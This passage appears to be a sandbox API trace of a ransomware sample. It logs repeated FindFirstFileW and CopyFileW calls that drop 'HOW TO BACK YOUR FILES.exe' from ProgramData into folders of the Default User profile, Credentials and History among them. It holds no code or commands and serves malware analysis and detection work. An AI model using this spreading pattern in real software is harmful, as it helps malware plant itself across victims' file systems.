(HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.632] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.633] CloseHandle (hObject=0x118) returned 1 [0042.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.633] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.633] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.633] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.633] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.634] GetLastError () returned 0x0 [0042.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.634] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.634] CloseHandle (hObject=0x118) returned 1 [0042.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.634] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.634] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.635] GetLastError () returned 0x0 [0042.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.635] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.635] CloseHandle (hObject=0x118) returned 1 [0042.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.635] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.636] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.636] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.636] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.636] GetLastError () returned 0x0 [0042.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.636] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.636] CloseHandle (hObject=0x118) returned 1 [0042.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.637] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.637] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.637] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.637] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.637] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.638] GetLastError () returned 0x0 [0042.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.638] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.638] CloseHandle (hObject=0x118) returned 1 [0042.638] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.638] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.638] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0042.638] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0042.638] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.638] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.639] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.639] GetLastError () returned 0x0 [0042.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.639] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.639] CloseHandle (hObject=0x118) returned 1 [0042.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.639] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.639] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.640] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.640] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.640] GetLastError () returned 0x0 [0042.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.640] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.640] CloseHandle (hObject=0x118) returned 1 [0042.640] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.640] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.641] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.641] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.641] GetLastError () returned 0x0 [0042.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.641] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.642] CloseHandle (hObject=0x118) returned 1 [0042.642] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.642] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.642] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0042.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0042.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.642] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.643] GetLastError () returned 0x0 [0042.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.643] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.643] CloseHandle (hObject=0x118) returned 1 [0042.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.643] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.643] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.643] lstrcatW (in: 